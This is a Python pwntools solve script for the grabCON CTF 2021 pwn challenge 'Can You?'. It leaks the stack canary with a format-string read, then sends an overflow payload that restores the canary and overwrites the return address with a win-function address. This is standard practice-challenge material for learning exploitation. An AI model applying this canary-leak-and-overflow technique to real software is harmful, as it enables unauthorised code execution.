grabCONCTF2021 - pwn - `Can You?`
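#!/usr/bin/env python3
from pwn import *

context.arch = 'i386'

'''
Solve script for the grabCON CTF 2021 pwn challenge "Can You?".

The first input is printed back through a format string, which leaks the stack
cookie. The second input overflows the buffer, so the leaked cookie is written
back into its own slot (the stack check still passes) and the saved return
address is replaced with the address of the win function.
'''

canary_format_str = "%31$p"  # format string that prints the stack-cookie slot
win = p32(0x08049236)        # win function
offset = 116                 # saved return address is 116 bytes from the input buffer
canary_offset = 100          # stack cookie is 100 bytes from the input buffer

io = process('./cancancan')

# --- leak the canary ---
# NOTE(review): recvline's first positional parameter is `keepends`, not a
# marker string — confirm this call consumes the prompt as intended.
io.recvline('can you bypass me???')
io.sendline(canary_format_str.encode())
# %p prints "0x..."; parse it as a hex integer rather than eval()'ing bytes
# that came back from the target process.
canary = int(io.recv().decode().strip(), 16)
log.info("Canary: {}".format(hex(canary)))

# --- overwrite the return address ---
# Put the cookie back at its slot so the stack check does not abort, then pad
# up to the saved return address and drop the win address there.
payload = b"A" * canary_offset + p32(canary)
payload += b"A" * (offset - len(payload)) + win
io.sendline(payload)
io.interactive()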